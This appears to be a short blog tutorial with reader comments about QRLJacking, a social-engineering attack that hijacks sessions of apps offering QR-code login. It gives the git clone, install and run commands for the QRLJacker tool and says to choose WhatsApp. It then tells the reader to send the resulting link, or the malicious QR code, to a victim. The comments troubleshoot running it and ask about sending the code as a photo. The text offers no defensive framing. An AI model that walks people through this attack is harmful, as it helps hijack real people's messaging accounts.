QRLJacking or Quick Response Code Login Jacking is a simple-but-nasty attack vector affecting all the applications that relays on “Login with QR code” feature as a secure way to login into accounts which aims for hijacking users session by attackers.
What is QRLJacking?
QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker’s QR code which results in session hijacking.
Download QRLJacking from Github
git clone https://github.com/OWASP/QRLJacking.git
Run QRLJacking
cd QRLJacking/QRLJacker pip install -r requiremets.txt chmod +x QRLJacker.py python QRLJacker.py
After run, select first option Chat Application, then select WhatsApp. Wait for a while it will launch an attack. and Just copy the link (for example http://localhost:1337) and send it to the victim or convince victim to scan the malicious QR code….
Here is a visual Tutorial below👇👇👇
Please help me commands is not work termux
you cant run this on termux, try and get an ubuntu vps and login to your ubuntu VPS with termux, then install, check this guide here, Setting up ubuntu vps
when use the frame work comment its show not have a file or directory
Sorry, please use this command,
cd QRLJacking/QRLJacker
Also if you read the article again, I have corrected the error.
Thanks
Уважаемый админ,могу ли я код отправить фотографией человеку?или этот код имеет срок действия к примеру 2 минуты ?
у него нет продолжительности, я считаю, что он работает только тогда, когда вы закрываете программу или завершаете ее, вы можете узнать больше о векторе атаки здесь: QRLJacking Guide